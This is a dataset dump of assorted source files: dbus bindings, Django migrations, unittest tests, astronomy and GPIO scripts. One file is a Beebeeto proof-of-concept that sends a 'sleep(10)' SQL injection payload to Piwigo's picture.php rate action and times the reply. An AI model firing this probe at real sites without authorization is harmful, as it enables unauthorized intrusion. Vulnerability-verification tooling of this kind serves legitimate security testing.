blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2dcd6f7f2a1f98bb39c8596f4e950498c9765ccd | 1fc234b59d2b0e1c49fcef5884a8136eb56ac04e | /discrete_probability/PDF.py | ed207d39b5c411a9c31f0e44b615759095c8b22c | [] | no_license | SrMouraSilva/RBMPedalboardBackup | 9a292460c7a0a3811e259ed3aa758ffbe204ab73 | 16438b942a965409a8c86c04e64c71f883b30ccf | refs/heads/master | 2020-04-03T00:25:13.165155 | 2018-10-26T21:51:48 | 2018-10-26T21:51:48 | 154,898,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | import pandas as pd
from typing import List, Tuple
class PDF(object):
def __init__(self, experiment: pd.DataFrame):
self.experiment = experiment
def __call__(self, variables: List[str]):
pass
def given(self, variables: List[str]) -> 'ConditionalProbability':
return ConditionalProbability(self.experiment, variables)
class ConditionalProbability(object):
def __init__(self, experiment, variables):
group_by = experiment.groupby(variables).sum()
self.conditional_experiment = group_by / group_by.sum()
def __getitem__(self, item: Tuple):
"""
:param item: Tuple of values ordered by the original variables?
"""
return self.conditional_experiment.loc[item]
| [
"mateus.moura@hotmail.com"
] | mateus.moura@hotmail.com |
4a2f33e9c7714b45151c27e76348439b97ab0ee6 | e77a3618d0afe63a2f00d87b61c3f19d3eba10d8 | /plugins/beebeeto/poc_2014_0221.py | fa9e3d4a6263af231383358eac672a3a12741e48 | [] | no_license | Explorer1092/coco | b54e88a527b29209de7c636833ac5d102514291b | 15c5aba0972ac68dc4c874ddacf5986af5ac2a64 | refs/heads/master | 2020-05-31T07:03:19.277209 | 2019-01-29T14:36:45 | 2019-01-29T14:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,058 | py | #!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import re
import urllib
import urllib2
from time import time
from baseframe import BaseFrame
class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
'poc': {
'id': 'poc-2014-0221',
'name': 'Piwigo <= v2.7.1 /functions_rate.inc.php SQL注入漏洞 POC',
'author': '雷锋',
'create_date': '2014-12-28',
},
# 协议相关信息
'protocol': {
'name': 'http',
'port': [80],
'layer4_protocol': ['tcp'],
},
# 漏洞相关信息
'vul': {
'app_name': 'Piwigo',
'vul_version': ['<=2.7.1'],
'type': 'SQL Injection',
'tag': ['Piwigo漏洞', 'SQL注入漏洞', '/functions_rate.inc.php', 'php'],
'desc': '''
由于functions_rate.inc.php文件中的rate_picture函数没有对传入的$rate变量
进行过滤,直接拼接到SQL中执行。
''',
'references': ['http://www.freebuf.com/articles/web/55075.html',
],
},
}
@classmethod
def verify(cls, args):
verify_url = '%s/picture.php?/3/category/1/&action=rate' % args['options']['target']
data = {'rate':'sleep(10)'}
req = urllib2.Request(verify_url)
data = urllib.urlencode(data)
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
a = time();
response = opener.open(req, data)
b = time();
req = urllib2.Request(verify_url)
if args['options']['verbose']:
print '[*] Request URL: ' + verify_url
c = b-a
if c>=10 and c<=15:
args['success'] = True
args['poc_ret']['vul_url'] = verify_url
return args
exploit = verify
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run()) | [
"834430486@qq.com"
] | 834430486@qq.com |
2dcd570258938d11c114742776270d2967aa0ff3 | 2fd087fbc5faf43940153693823969df6c8ec665 | /pyc_decrypted/latest/dbus/_dbus.py | 0ba1f777f9f8cd555e63eb655b27250266421ba5 | [] | no_license | mickeystone/DropBoxLibrarySRC | ed132bbffda7f47df172056845e5f8f6c07fb5de | 2e4a151caa88b48653f31a22cb207fff851b75f8 | refs/heads/master | 2021-05-27T05:02:30.255399 | 2013-08-27T13:16:55 | 2013-08-27T13:16:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,739 | py | #Embedded file name: dbus/_dbus.py
from __future__ import generators
__all__ = ('Bus', 'SystemBus', 'SessionBus', 'StarterBus')
__docformat__ = 'reStructuredText'
import os
import sys
import weakref
from traceback import print_exc
from dbus.exceptions import DBusException
from _dbus_bindings import BUS_DAEMON_NAME, BUS_DAEMON_PATH, BUS_DAEMON_IFACE, UTF8String, validate_member_name, validate_interface_name, validate_bus_name, validate_object_path, BUS_SESSION, BUS_SYSTEM, BUS_STARTER, DBUS_START_REPLY_SUCCESS, DBUS_START_REPLY_ALREADY_RUNNING
from dbus.bus import BusConnection
from dbus.lowlevel import SignalMessage
try:
import thread
except ImportError:
import dummy_thread as thread
class Bus(BusConnection):
_shared_instances = {}
def __new__(cls, bus_type = BusConnection.TYPE_SESSION, private = False, mainloop = None):
if not private and bus_type in cls._shared_instances:
return cls._shared_instances[bus_type]
if bus_type == BUS_SESSION:
subclass = SessionBus
elif bus_type == BUS_SYSTEM:
subclass = SystemBus
elif bus_type == BUS_STARTER:
subclass = StarterBus
else:
raise ValueError('invalid bus_type %s' % bus_type)
bus = BusConnection.__new__(subclass, bus_type, mainloop=mainloop)
bus._bus_type = bus_type
if not private:
cls._shared_instances[bus_type] = bus
return bus
def close(self):
t = self._bus_type
if self.__class__._shared_instances.get(t) is self:
del self.__class__._shared_instances[t]
super(Bus, self).close()
def get_connection(self):
return self
_connection = property(get_connection, None, None, 'self._connection == self, for backwards\n compatibility with earlier dbus-python versions\n where Bus was not a subclass of Connection.')
def get_session(private = False):
return SessionBus(private=private)
get_session = staticmethod(get_session)
def get_system(private = False):
return SystemBus(private=private)
get_system = staticmethod(get_system)
def get_starter(private = False):
return StarterBus(private=private)
get_starter = staticmethod(get_starter)
def __repr__(self):
if self._bus_type == BUS_SESSION:
name = 'session'
elif self._bus_type == BUS_SYSTEM:
name = 'system'
elif self._bus_type == BUS_STARTER:
name = 'starter'
else:
name = 'unknown bus type'
return '<%s.%s (%s) at %#x>' % (self.__class__.__module__,
self.__class__.__name__,
name,
id(self))
__str__ = __repr__
class SystemBus(Bus):
def __new__(cls, private = False, mainloop = None):
return Bus.__new__(cls, Bus.TYPE_SYSTEM, mainloop=mainloop, private=private)
class SessionBus(Bus):
def __new__(cls, private = False, mainloop = None):
return Bus.__new__(cls, Bus.TYPE_SESSION, private=private, mainloop=mainloop)
class StarterBus(Bus):
def __new__(cls, private = False, mainloop = None):
return Bus.__new__(cls, Bus.TYPE_STARTER, private=private, mainloop=mainloop)
if 'DBUS_PYTHON_NO_DEPRECATED' not in os.environ:
class _DBusBindingsEmulation:
def __str__(self):
return '_DBusBindingsEmulation()'
def __repr__(self):
return '_DBusBindingsEmulation()'
def __getattr__(self, attr):
global dbus_bindings
import dbus.dbus_bindings as m
dbus_bindings = m
return getattr(m, attr)
dbus_bindings = _DBusBindingsEmulation()
| [
"bizonix@me.com"
] | bizonix@me.com |
eae1d5aa871c197f2e4c2314be6a3595cea2021e | d3feeb1f109d4a0d8d5d78bc36f0a92a9daba62e | /apps/organization/migrations/0001_initial.py | 2ae98e4bdde8e2aa97d6ceb86fcfcf74458caac7 | [] | no_license | yhgnice/vbtools | fa93750b6239704d6274326a50c65db7ca202ad4 | 33d67c2a9c89faeaf5688a79680af6fc31555ff7 | refs/heads/master | 2021-01-21T11:15:46.230560 | 2017-03-01T10:18:49 | 2017-03-01T10:18:49 | 83,540,741 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,603 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-02-14 15:10
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CityDict',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='\u57ce\u5e02\u540d\u79f0')),
('desc', models.TextField(max_length=200, verbose_name='\u57ce\u5e02\u63cf\u8ff0')),
('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\u6dfb\u52a0\u65f6\u95f4')),
],
options={
'verbose_name': '\u673a\u6784\u5730\u5740',
'verbose_name_plural': '\u673a\u6784\u5730\u5740',
},
),
migrations.CreateModel(
name='CourseOrg',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='\u673a\u6784\u540d\u79f0')),
('desc', models.TextField(verbose_name='\u673a\u6784\u63cf\u8ff0')),
('click_num', models.IntegerField(default=0, verbose_name='\u70b9\u51fb\u6570')),
('fav_nums', models.IntegerField(default=0, verbose_name='\u6536\u85cf\u6570')),
('image', models.ImageField(upload_to='org/%Y/%m', verbose_name='\u5c01\u9762\u56fe')),
('address', models.CharField(max_length=150, verbose_name='\u673a\u6784\u5730\u5740')),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.CityDict', verbose_name='\u6240\u5728\u57ce\u5e02')),
],
options={
'verbose_name': '\u673a\u6784\u5730\u5740',
'verbose_name_plural': '\u673a\u6784\u5730\u5740',
},
),
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, verbose_name='\u6559\u6388\u540d')),
('work_years', models.IntegerField(default=0, verbose_name='\u5de5\u4f5c\u5e74\u9650')),
('work_company', models.CharField(max_length=50, verbose_name='\u5c31\u804c\u516c\u53f8')),
('work_position', models.CharField(max_length=50, verbose_name='\u516c\u53f8\u804c\u52a1')),
('points', models.CharField(max_length=50, verbose_name='\u6559\u5b66\u7279\u70b9')),
('image', models.ImageField(default='', upload_to='teacher/%Y/%m', verbose_name='\u5934\u50cf')),
('fav_nums', models.IntegerField(default=0, verbose_name='\u6536\u85cf\u4eba\u6570')),
('click_nums', models.IntegerField(default=0, verbose_name='\u70b9\u51fb\u91cf')),
('add_time', models.DateTimeField(default=datetime.datetime.now)),
('org', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.CourseOrg', verbose_name='\u6240\u5c5e\u673a\u6784')),
],
options={
'verbose_name': '\u6559\u5e08',
'verbose_name_plural': '\u6559\u5e08',
},
),
]
| [
"123"
] | 123 |
aa9b04df156993dc5bb435472b42859dfae95690 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/sc_1717-364/sdB_sc_1717-364_coadd.py | 491849876ccdc3f9dc2eaa7e1310236b158e424d | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 431 | py | from gPhoton.gMap import gMap
def main():
gMap(band="NUV", skypos=[260.238292,-36.497778], skyrange=[0.0333333333333,0.0333333333333], stepsz = 30., cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_sc_1717-364/sdB_sc_1717-364_movie_count.fits", cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_sc_1717-364/sdB_sc_1717-364_count_coadd.fits", overwrite=True, verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
de11a72a4bf1877037b75859b5e37148a9c335c4 | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/unittest/test/test_runner.py | 11a734aea40efcb5ca625872f999c1ff368cef69 | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 7,971 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\stdlib\unittest\test\test_runner.py
import unittest
from cStringIO import StringIO
import pickle
from .support import LoggingResult, ResultWithNoStartTestRunStopTestRun
class TestCleanUp(unittest.TestCase):
def testCleanUp(self):
class TestableTest(unittest.TestCase):
def testNothing(self):
pass
test = TestableTest('testNothing')
self.assertEqual(test._cleanups, [])
cleanups = []
def cleanup1(*args, **kwargs):
cleanups.append((1, args, kwargs))
def cleanup2(*args, **kwargs):
cleanups.append((2, args, kwargs))
test.addCleanup(cleanup1, 1, 2, 3, four='hello', five='goodbye')
test.addCleanup(cleanup2)
self.assertEqual(test._cleanups, [(cleanup1, (1, 2, 3), dict(four='hello', five='goodbye')), (cleanup2, (), {})])
result = test.doCleanups()
self.assertTrue(result)
self.assertEqual(cleanups, [(2, (), {}), (1, (1, 2, 3), dict(four='hello', five='goodbye'))])
def testCleanUpWithErrors(self):
class TestableTest(unittest.TestCase):
def testNothing(self):
pass
class MockResult(object):
errors = []
def addError(self, test, exc_info):
self.errors.append((test, exc_info))
result = MockResult()
test = TestableTest('testNothing')
test._resultForDoCleanups = result
exc1 = Exception('foo')
exc2 = Exception('bar')
def cleanup1():
raise exc1
def cleanup2():
raise exc2
test.addCleanup(cleanup1)
test.addCleanup(cleanup2)
self.assertFalse(test.doCleanups())
(test1, (Type1, instance1, _)), (test2, (Type2, instance2, _)) = reversed(MockResult.errors)
self.assertEqual((test1, Type1, instance1), (test, Exception, exc1))
self.assertEqual((test2, Type2, instance2), (test, Exception, exc2))
def testCleanupInRun(self):
blowUp = False
ordering = []
class TestableTest(unittest.TestCase):
def setUp(self):
ordering.append('setUp')
if blowUp:
raise Exception('foo')
def testNothing(self):
ordering.append('test')
def tearDown(self):
ordering.append('tearDown')
test = TestableTest('testNothing')
def cleanup1():
ordering.append('cleanup1')
def cleanup2():
ordering.append('cleanup2')
test.addCleanup(cleanup1)
test.addCleanup(cleanup2)
def success(some_test):
self.assertEqual(some_test, test)
ordering.append('success')
result = unittest.TestResult()
result.addSuccess = success
test.run(result)
self.assertEqual(ordering, ['setUp',
'test',
'tearDown',
'cleanup2',
'cleanup1',
'success'])
blowUp = True
ordering = []
test = TestableTest('testNothing')
test.addCleanup(cleanup1)
test.run(result)
self.assertEqual(ordering, ['setUp', 'cleanup1'])
def testTestCaseDebugExecutesCleanups(self):
ordering = []
class TestableTest(unittest.TestCase):
def setUp(self):
ordering.append('setUp')
self.addCleanup(cleanup1)
def testNothing(self):
ordering.append('test')
def tearDown(self):
ordering.append('tearDown')
test = TestableTest('testNothing')
def cleanup1():
ordering.append('cleanup1')
test.addCleanup(cleanup2)
def cleanup2():
ordering.append('cleanup2')
test.debug()
self.assertEqual(ordering, ['setUp',
'test',
'tearDown',
'cleanup1',
'cleanup2'])
class Test_TextTestRunner(unittest.TestCase):
def test_init(self):
runner = unittest.TextTestRunner()
self.assertFalse(runner.failfast)
self.assertFalse(runner.buffer)
self.assertEqual(runner.verbosity, 1)
self.assertTrue(runner.descriptions)
self.assertEqual(runner.resultclass, unittest.TextTestResult)
def testBufferAndFailfast(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
result = unittest.TestResult()
runner = unittest.TextTestRunner(stream=StringIO(), failfast=True, buffer=True)
runner._makeResult = lambda : result
runner.run(Test('testFoo'))
self.assertTrue(result.failfast)
self.assertTrue(result.buffer)
def testRunnerRegistersResult(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
originalRegisterResult = unittest.runner.registerResult
def cleanup():
unittest.runner.registerResult = originalRegisterResult
self.addCleanup(cleanup)
result = unittest.TestResult()
runner = unittest.TextTestRunner(stream=StringIO())
runner._makeResult = lambda : result
self.wasRegistered = 0
def fakeRegisterResult(thisResult):
self.wasRegistered += 1
self.assertEqual(thisResult, result)
unittest.runner.registerResult = fakeRegisterResult
runner.run(unittest.TestSuite())
self.assertEqual(self.wasRegistered, 1)
def test_works_with_result_without_startTestRun_stopTestRun(self):
class OldTextResult(ResultWithNoStartTestRunStopTestRun):
separator2 = ''
def printErrors(self):
pass
class Runner(unittest.TextTestRunner):
def __init__(self):
super(Runner, self).__init__(StringIO())
def _makeResult(self):
return OldTextResult()
runner = Runner()
runner.run(unittest.TestSuite())
def test_startTestRun_stopTestRun_called(self):
class LoggingTextResult(LoggingResult):
separator2 = ''
def printErrors(self):
pass
class LoggingRunner(unittest.TextTestRunner):
def __init__(self, events):
super(LoggingRunner, self).__init__(StringIO())
self._events = events
def _makeResult(self):
return LoggingTextResult(self._events)
events = []
runner = LoggingRunner(events)
runner.run(unittest.TestSuite())
expected = ['startTestRun', 'stopTestRun']
self.assertEqual(events, expected)
def test_pickle_unpickle(self):
from StringIO import StringIO as PickleableIO
stream = PickleableIO('foo')
runner = unittest.TextTestRunner(stream)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
s = pickle.dumps(runner, protocol=protocol)
obj = pickle.loads(s)
self.assertEqual(obj.stream.getvalue(), stream.getvalue())
def test_resultclass(self):
def MockResultClass(*args):
return args
STREAM = object()
DESCRIPTIONS = object()
VERBOSITY = object()
runner = unittest.TextTestRunner(STREAM, DESCRIPTIONS, VERBOSITY, resultclass=MockResultClass)
self.assertEqual(runner.resultclass, MockResultClass)
expectedresult = (runner.stream, DESCRIPTIONS, VERBOSITY)
self.assertEqual(runner._makeResult(), expectedresult)
if __name__ == '__main__':
unittest.main()
| [
"masaho.shiro@gmail.com"
] | masaho.shiro@gmail.com |
ee3e365f9cb19991b8c30e535b0e2e0d8175ea01 | c87a4c8c40ba0711f57ba49461c84daf5707ca9b | /wscript | 79900d156591cbe0812a7379e08644b57187800d | [] | no_license | wwwqqqlll/fully-dynamic-betweenness-centrality | fdecc09b0e07eae1ab3cfeed21d86ec7bc673f3b | 0bb6422f704ad43e1a3d7a37a4b9b83df8f46689 | refs/heads/master | 2023-03-17T23:13:55.895071 | 2017-09-14T19:35:25 | 2017-09-14T19:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | #! /usr/bin/env python3
APPNAME= 'fully_dynamic_betweenness_centrality'
VERSION= '0.0.1'
top = '.'
out = 'bin'
def options(opt):
opt.tool_options('compiler_cxx')
opt.tool_options('waf_unit_test')
def configure(conf):
conf.load('compiler_cxx')
conf.check_tool('compiler_cxx')
conf.env.append_value('CXXFLAGS', ['-Wall', '-Wextra', '-g', '-O3', '-std=c++11', '-Wno-unused-local-typedefs'])
conf.check_cxx(lib = ['pthread'], uselib_store = 'common')
def build(bld):
bld.recurse('lib')
bld.recurse('src')
| [
"flowlight0@gmail.com"
] | flowlight0@gmail.com | |
0ac08c89716350174f18a687e1846eb2ed6ee541 | c8d3d66f7ae240f76c7ee95300939b32c6330352 | /python/grblio/tcpport.py | 2d35364e924728cc42407684e4642eb3db1b5a08 | [] | no_license | cnvogelg/cvmill | 6e07c1eaf86696e5cfd7056ff3a922757dd55ff3 | f97639491943aa98348118ccff5970f1ca170bde | refs/heads/master | 2021-01-10T21:45:48.169826 | 2015-10-17T18:04:03 | 2015-10-17T18:04:03 | 33,114,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,106 | py | #!/usr/bin/env python3
import socket
import select
import port
class TcpPort(port.Port):
"""connect the Grbl host via a socat TCP pipe"""
def __init__(self, hostname, hostport=5000, eol="\r\n"):
port.Port.__init__(self, eol)
self.hostname = hostname
self.hostport = hostport
def open(self):
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.settimeout(1)
self._socket.connect((self.hostname, self.hostport))
def close(self):
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
def write(self, buf):
self._socket.sendall(buf.encode("utf-8"))
def _read_ready(self, timeout):
no = self._socket.fileno()
res = select.select([no],[],[],timeout)
ready = len(res[0]) > 0
return ready
def _read(self):
return self._socket.recv(1024).decode("utf-8")
if __name__ == '__main__':
import sys
import time
if len(sys.argv) != 2:
print("Usage:",sys.argv[0],"<host>")
sys.exit(1)
host = sys.argv[1]
tp = TcpPort(host)
t = port.PortTest(tp)
t.run()
| [
"C.Vogelgsang@web.de"
] | C.Vogelgsang@web.de |
8a6f631e2e4a617c4bacc375bbcf0557a3e756ef | eb0711915d6bba2f765f052736e33ac9a9a397a6 | /HE1104/w_model_rms/glee_samp_1.0/samp57/glee_chain.py | aca54bcef4b6f487dfab6002bb9e7c866fddc7d5 | [] | no_license | dartoon/GL_HostGalaxy | cd2166f273ae7e0397a7d2d39f760ab59e86f014 | 7469f1c1e640d176a75cc6e9497920e494ad656a | refs/heads/master | 2016-08-11T13:27:17.545360 | 2016-04-07T19:04:57 | 2016-04-07T19:04:57 | 46,524,027 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | import numpy,subprocess
file1 = open('HE57.001.mcmc','r') #should changed with right name
para = numpy.loadtxt(file1)[-30:,0]
file1.close()
i=int(para[0])
#subprocess.call(["echo int(para[0])"],shell=True)
#subprocess.call(["glee -S ${i} HE57.001.001"],shell=True)
#print para.shape
#print para.astype(int)
g=open('chain_NO','w')
numpy.savetxt(g,para.astype(int),fmt='%i')
g.close
| [
"dingxuheng@mail.bnu.edu.cn"
] | dingxuheng@mail.bnu.edu.cn |
d0fe6e65861aad377033952b65f21df9a02bbe7a | 0fbc5cf8f4903e9e72d7a448a31bfbfe2f54821b | /Chapter12/12.8.py | 8c77f6075216e8a8a7b8dcdbf3fe11f0b3d4723d | [
"MIT"
] | permissive | PacktPublishing/Python-Robotics-Projects | a3a90e6698b0e486a5547ffb6211415c4a0e4f5a | 17221304cb3e15e486af855b442927f64fdcc738 | refs/heads/master | 2023-02-08T16:27:55.723634 | 2023-01-30T09:35:39 | 2023-01-30T09:35:39 | 134,238,783 | 24 | 16 | null | null | null | null | UTF-8 | Python | false | false | 747 | py | import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
S0 = 21
S1 = 22
S2 = 23
S3 = 24
GPIO.setup(S0,GPIO.OUT)
GPIO.setup(S1,GPIO.OUT)
GPIO.setup(S2,GPIO.OUT)
While True:
GPIO.output(S0,1)
GPIO.output(S1,0)
GPIO.output(S2,1)
GPIO.output(S4,1)
time.sleep(1)
GPIO.output(S0,1)
GPIO.output(S1,1)
GPIO.output(S2,1)
GPIO.output(S4,1)
time.sleep(1)
GPIO.output(S0,1)
GPIO.output(S1,0)
GPIO.output(S2,0)
GPIO.output(S4,1)
time.sleep(1)
'GPIO.output(S0,0)
GPIO.output(S1,0)
GPIO.output(S2,0)
GPIO.output(S4,1)
time.sleep(1)
GPIO.output(S0,0)
GPIO.output(S1,1)
GPIO.output(S2,0)
GPIO.output(S4,1)
time.sleep(1) } | [
"komalk@packtpub.com"
] | komalk@packtpub.com |
16d61e2dc2d30b2062edf9bf30d6c7d4a5763fb5 | 479696ed99f10e449308bf3379e8b3d167365ebe | /spa/forms.py | 04250e8ee2663c3fd252d14b6c8219b9ea99f35f | [
"BSD-2-Clause"
] | permissive | fergalmoran/dss | 7c690ba0b858c3d7d115af54655954ecee64407e | 684fb4030e33212c3ecde774ca86cb74a1ffc8ac | refs/heads/master | 2021-07-06T02:46:49.064282 | 2015-01-04T22:19:31 | 2015-01-04T22:19:31 | 5,353,985 | 0 | 0 | BSD-2-Clause | 2021-06-10T17:35:38 | 2012-08-09T10:03:17 | JavaScript | UTF-8 | Python | false | false | 2,139 | py | from django import forms
from django.contrib.auth.models import User
from django.forms.models import ModelForm
from spa.models.userprofile import UserProfile
class UserForm(ModelForm):
avatar_image_select = forms.ChoiceField(
choices=(
('gravatar', "Use gravatar image."),
('social', "Use Twitter/Facebook image."),
('custom', "Use custom image (upload below).")
),
label="Avatar Image",
widget=forms.RadioSelect,
initial='option_gravatar',
help_text="Select the source of your avatar image."
)
avatar_image = forms.ImageField(
label="",
required=False
)
class Meta:
model = User
fields = ('email', 'first_name', 'last_name')
def __init__(self, *args, **kwargs):
super(UserForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(
Fieldset(
'User details',
'display_name',
'email',
'first_name',
'last_name',
'avatar_image_select',
'avatar_image'
),
FormActions(
Submit('save_changes', 'Save changes', css_class="btn-primary"),
Submit('cancel', 'Cancel'),
)
)
self.helper.form_class = 'form-horizontal'
self.helper.form_id = 'id-new-user-form'
self.helper.form_method = 'post'
self.helper.form_error_title = 'Ooopsies'
self.helper.formset_error_title = 'Ooopsies'
self.helper.form_show_errors = True
def save(self, *args, **kwargs):
user = super(UserForm, self).save(*args, **kwargs)
profile = UserProfile.objects.filter(user=user)[0]
if profile is None:
profile = UserProfile()
profile.user = user
profile.avatar_type = self.cleaned_data['avatar_image_select']
profile.avatar_image = self.cleaned_data['avatar_image']
# and so on with the remaining fields
profile.save()
return profile
| [
"fergal.moran@gmail.com"
] | fergal.moran@gmail.com |
ca7bd8dbfa94556f4e6d86d74e718738f11b078c | a507b5f72182d0f46f967d8c6816b4b816341b60 | /python/WorksharingSession.UsesCentralModel.py | 89976d13c9874f3170bcee040165a38b6cecfcec | [
"MIT"
] | permissive | BIMpraxis/Journalysis | c00d167a783b636fcf8104738bf84ef36578a1c7 | af0c042b28d01ba5e44dafc2bbe9556434e897b8 | refs/heads/master | 2020-04-18T20:37:44.456123 | 2019-01-26T22:01:22 | 2019-01-26T22:01:22 | 167,742,529 | 0 | 0 | MIT | 2019-01-26T21:46:42 | 2019-01-26T21:46:42 | null | UTF-8 | Python | false | false | 324 | py | import clr
def process_input(func, input):
if isinstance(input, list): return [func(x) for x in input]
else: return func(input)
def WSSessionUsesCentralModel(wssess):
if wssess.__repr__() == 'WorksharingSession': return wssess.UsesCentralModel()
else: return None
OUT = process_input(WSSessionUsesCentralModel,IN[0]) | [
"dieckmann@caad.arch.rwth-aachen.de"
] | dieckmann@caad.arch.rwth-aachen.de |
2f82f686a54d9e5d0f155c31f1dbc15af4e2c8f9 | 5f34e0e59954c0e8991eb8cfb1d58c0cefcf4c68 | /script/Mapper1.py | 0869f0bed1375b84a0b2b4093a4ea18b130c3356 | [] | no_license | ChenddatHKU/PAlib240 | cd31ca5e8e3b5796721cb77d7bc3861a78e1a358 | c38048900b10fe755a70a13f9cd18585d75922e4 | refs/heads/master | 2022-12-10T21:51:57.974611 | 2016-07-07T06:27:49 | 2016-07-07T06:27:49 | 293,680,127 | 0 | 0 | null | 2020-09-08T02:28:09 | 2020-09-08T02:28:09 | null | UTF-8 | Python | false | false | 4,233 | py | #!/usr/bin/python
import os
import sys
import glob
import string
import operator
from string import atof
from itertools import imap
from Bio import SeqIO
def rc(seq):
complements = string.maketrans('acgtrymkbdhvACGTRYMKBDHV', 'tgcayrkmvhdbTGCAYRKMVHDB')
rcseq = seq.translate(complements)[::-1]
return rcseq
def hamming(str1, str2):
assert len(str1) == len(str2)
return sum(imap(operator.ne, str1, str2))
def list2string(l):
newl = []
for i in l:
newl.append(str(i))
return newl
def string2atof(l):
newl = []
for i in l:
newl.append(atof(i))
return newl
def readrecord(filename,outfile):
Rrecords = {}
outfile = open(outfile,'w')
for record in SeqIO.parse(filename, "fastq"):
ID = record.id
seq = record.seq
qual = list2string(record.letter_annotations["phred_quality"])
assert(not Rrecords.has_key(ID))
outfile.write(str(ID)+"\t"+str(seq)+"\t"+'-'.join(qual)+"\n")
outfile.close()
def offsetcheck(R_seq,refseqs):
for i in range(0,len(R_seq)-240+1):
Fseq = R_seq[i:i+240]
Rseq = rc(Fseq)
for ref in refseqs.keys():
refseq = refseqs[ref]
Fhdist = hamming(refseq,Fseq)
Rhdist = hamming(refseq,Rseq)
if Fhdist <= 6:
strand = 'F'
Roffset = i
return [ref,Roffset,strand]
if Rhdist <= 6:
strand = 'R'
Roffset = i
return [ref,Roffset,strand]
return 'bad'
def MapNPair(R1tmp, R2tmp,mfile,refseqs):
R1file = open(R1tmp,'r')
R2file = open(R2tmp,'r')
mfile = open(mfile,'w')
badBC = 0
total = 0
for line in R1file.xreadlines():
R1record = line.rstrip().rsplit("\t")
R1_ID = R1record[0]
R1_bc = R1record[1][0:4]
R1_seq = R1record[1][4::]
R1_qual = string2atof(R1record[2].rsplit('-'))
R2record = R2file.readline().rstrip().rsplit("\t")
R2_ID = R2record[0]
R2_bc = R2record[1][0:4]
R2_seq = R2record[1][4::]
R2_qual = string2atof(R2record[2].rsplit('-'))
#QUALITY CONTROL#
total += 1
assert(R1_ID == R2_ID)
if R1_bc != R2_bc:
badBC += 1
continue
if len(R1_seq) < 240: continue
if len(R2_seq) < 240: continue
#END OF QUALITY CONTROL#
